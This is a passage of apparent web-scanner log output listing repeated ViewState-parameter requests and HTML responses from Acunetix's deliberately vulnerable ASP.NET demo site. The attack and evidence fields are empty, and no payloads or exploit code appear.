Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8224&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAHM10YNoIZGRkSPlrKWVgvbEaKkL07xcEp3NhtKw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK51YyDBgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FVLQIyX14bUEhd1%2Fp9nR09w5G5Fw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:12 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAHM10YNoIZGRkSPlrKWVgvbEaKkL07xcEp3NhtKw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK51YyDBgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/VLQIyX14bUEhd1/p9nR09w5G5Fw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:White" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8212&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAJ9AGV9oIZGRkaaPNzWXIhicmCNoGmnzqZBqwbtQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWqPLxAwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BNnirVnoTbqijxyVHHWFSd5OqMRg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAJ9AGV9oIZGRkaaPNzWXIhicmCNoGmnzqZBqwbtQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWqPLxAwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+NnirVnoTbqijxyVHHWFSd5OqMRg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:White" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
